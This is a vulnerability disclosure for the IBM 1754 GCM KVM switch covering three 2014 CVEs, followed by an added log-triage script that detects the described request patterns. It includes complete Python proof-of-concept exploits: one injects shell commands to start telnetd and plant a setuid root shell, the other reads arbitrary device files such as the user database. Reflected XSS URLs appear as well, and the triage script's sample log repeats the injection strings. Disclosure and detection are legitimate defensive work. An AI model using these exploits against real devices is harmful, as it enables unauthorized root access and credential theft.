*Product description*

The IBM 1754 GCM family provides KVM over IP and serial console management technology in a single appliance. Versions v1.20.0.22575 and prior are

Note that this vulnerability is also present in some Dell and probably other vendors' versions of this rebranded KVM. I contacted Dell but no response has been received.

*1. Remote code execution*

CVEID: CVE-2014-2085

Description: Improperly sanitized input may allow a remote authenticated attacker to perform remote code execution on the GCM KVM switch.

PoC of this vulnerability:

#!/usr/bin/python
"""
Exploit for Avocent KVM switch v1.20.0.22575.
Remote code execution with privilege elevation.
SessionId (avctSessionId) is necessary for this to work, so you need a
valid user. Default user is "Admin" with blank password.
After running exploit, connect using telnet to device with user target
(pass: target) then do "/tmp/su -" to gain root (password "root")
alex.a.bravo@gmail.com
"""
from StringIO import StringIO
import pycurl
import os

sessid = "1111111111"
target = "192.168.0.10"
durl = "https://" + target + "/systest.php?lpres=;%20/usr/sbin/telnetd%20;%20cp%20/bin/busybox%20/tmp/su%20;%20chmod%206755%20/tmp/su%20;"
storage = StringIO()
c = pycurl.Curl()
c.setopt(c.URL, durl)
c.setopt(c.SSL_VERIFYPEER, 0)
c.setopt(c.SSL_VERIFYHOST, 0)
c.setopt(c.WRITEFUNCTION, storage.write)
c.setopt(c.COOKIE, 'avctSessionId=' + sessid)
try:
    print "[*] Sending GET to " + target + " with session id " + sessid + "..."
    c.perform()
    c.close()
except:
    print ""
finally:
    print "[*] Done"
print "[*] Trying telnet..."
print "[*] Login as target/target, then do /tmp/su - and enter password \"root\""
os.system("telnet " + target)

*2. Arbitrary file read*

CVEID: CVE-2014-3081

Description: This device allows any authenticated user to read arbitrary files. Files can be anywhere on the target.

PoC of this vulnerability:

#!/usr/bin/python
"""
This exploit for Avocent KVM switch v1.20.0.22575 allows an attacker to
read arbitrary files on device.
SessionId (avctSessionId) is necessary for this to work, so you need a
valid user.
alex.a.bravo@gmail.com
"""
from StringIO import StringIO
import pycurl

sessid = "1111111111"
target = "192.168.0.10"
file = "/etc/IBM_user.dat"
durl = "https://" + target + "/prodtest.php?engage=video_bits&display=results&filename=" + file
storage = StringIO()
c = pycurl.Curl()
c.setopt(c.URL, durl)
c.setopt(c.SSL_VERIFYPEER, 0)
c.setopt(c.SSL_VERIFYHOST, 0)
c.setopt(c.WRITEFUNCTION, storage.write)
c.setopt(c.COOKIE, 'avctSessionId=' + sessid)
try:
    c.perform()
    c.close()
except:
    print ""
content = storage.getvalue()
print content.replace("<td>", "").replace("</td>", "")

*3. Cross site scripting (non-persistent)*

CVEID: CVE-2014-3080

Description: The system is vulnerable to cross-site scripting, caused by improper validation of user-supplied input. A remote attacker could exploit this vulnerability using a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials.

Examples:

http://kvm/kvm.cgi?%3Cscript%3Ealert%28%22aaa%22%29%3C/script%3E
https://kvm/avctalert.php?arg1=dadadasdasd&arg2=dasdasdas&key=%3Cscript%3Ealert%28%22aaa%22%29%3C/script%3E

*Vendor Response:*

IBM released firmware 1.20.20.23447.

*Timeline:*

2014-05-20 - Vendor (PSIRT) notified
2014-05-21 - Vendor assigns internal ID
2014-07-16 - Patch disclosed
2014-07-17 - Vulnerability disclosed

*External Information:*

Info about the vulnerability (Spanish):
http://www.bitcloud.es/2014/07/tres-nuevas-vulnerabilidades-en-ibm-gcm.html

IBM Security Bulletin:
http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=MIGR-5095983
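The three findings above share one detection angle: each is an authenticated GET whose query string has a recognisable shape (shell metacharacters in the systest.php lpres parameter, an absolute or traversing path in the prodtest.php filename parameter, a script tag reflected through kvm.cgi or avctalert.php). The following triage script is an added example written for this page, not code from the advisory's author or from IBM/Avocent. It assumes web-server logs in Apache combined format, taken either from the appliance itself or from a reverse proxy placed in front of it (the advisory does not say what the GCM logs natively); the log lines, client IPs and the benign filename are constructed for the example.

```python
"""Access-log triage for the request shapes described in this advisory
(added example, not part of the original post).  Assumes Apache combined
format; the sample lines below are constructed, not captured from a device."""
import re
from urllib.parse import urlsplit, unquote

# Constructed sample log: four requests matching the advisory's patterns and
# two benign ones.  Client IPs are documentation addresses (RFC 5737).
SAMPLE_LOG = """\
192.0.2.10 - - [17/Jul/2014:10:01:02 +0000] "GET /systest.php?lpres=;%20/usr/sbin/telnetd%20;%20cp%20/bin/busybox%20/tmp/su%20; HTTP/1.1" 200 512
192.0.2.11 - - [17/Jul/2014:10:02:03 +0000] "GET /prodtest.php?engage=video_bits&display=results&filename=/etc/IBM_user.dat HTTP/1.1" 200 2048
192.0.2.12 - - [17/Jul/2014:10:03:04 +0000] "GET /avctalert.php?arg1=a&arg2=b&key=%3Cscript%3Ealert%28%22aaa%22%29%3C/script%3E HTTP/1.1" 200 300
192.0.2.13 - - [17/Jul/2014:10:04:05 +0000] "GET /kvm.cgi?%3Cscript%3Ealert%28%22aaa%22%29%3C/script%3E HTTP/1.1" 200 300
192.0.2.14 - - [17/Jul/2014:10:05:06 +0000] "GET /login.php HTTP/1.1" 200 1024
192.0.2.15 - - [17/Jul/2014:10:06:07 +0000] "GET /prodtest.php?engage=video_bits&display=results&filename=video_stats.txt HTTP/1.1" 200 100
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)
# Characters that chain or substitute commands once the value reaches a shell.
SHELL_META = re.compile(r'[;|&`]|\$\(|\$\{')
SCRIPT_TAG = re.compile(r'<\s*script\b', re.IGNORECASE)


def decode(value, rounds=2):
    """URL-decode repeatedly so a double-encoded '<' (%253C) is also seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def parse_query(query):
    """Split a query string on '&' only.  urllib's parse_qs is avoided because
    older Python versions also split on ';', which would hide the very
    character the lpres check looks for."""
    params = {}
    for pair in query.split('&'):
        if not pair:
            continue
        key, _, val = pair.partition('=')
        params.setdefault(key, []).append(val)
    return params


def classify(uri):
    """Return the CVE labels whose request shape matches one URI."""
    parts = urlsplit(uri)
    path = parts.path.lower()
    params = parse_query(parts.query)
    findings = []
    if path.endswith('/systest.php'):
        for v in params.get('lpres', []):
            if SHELL_META.search(decode(v)):
                findings.append('CVE-2014-2085')
    if path.endswith('/prodtest.php'):
        for v in params.get('filename', []):
            d = decode(v)
            # Anything absolute or traversing is outside the expected use.
            if d.startswith('/') or '..' in d.split('/'):
                findings.append('CVE-2014-3081')
    if path.endswith(('/kvm.cgi', '/avctalert.php')):
        if SCRIPT_TAG.search(decode(parts.query)):
            findings.append('CVE-2014-3080')
    return findings


def scan(log_text):
    """Return (client_ip, uri, findings) for every log line that matches."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        findings = classify(m.group('uri'))
        if findings:
            hits.append((m.group('ip'), m.group('uri'), findings))
    return hits


if __name__ == '__main__':
    for ip, uri, findings in scan(SAMPLE_LOG):
        print(ip, ', '.join(findings), uri)
```

Because all three issues require a valid avctSessionId, a hit is best read together with the session's login record: a match from an account that should never touch the diagnostic pages (systest.php, prodtest.php) is the strongest signal, and the fix remains upgrading to the firmware named in the vendor response.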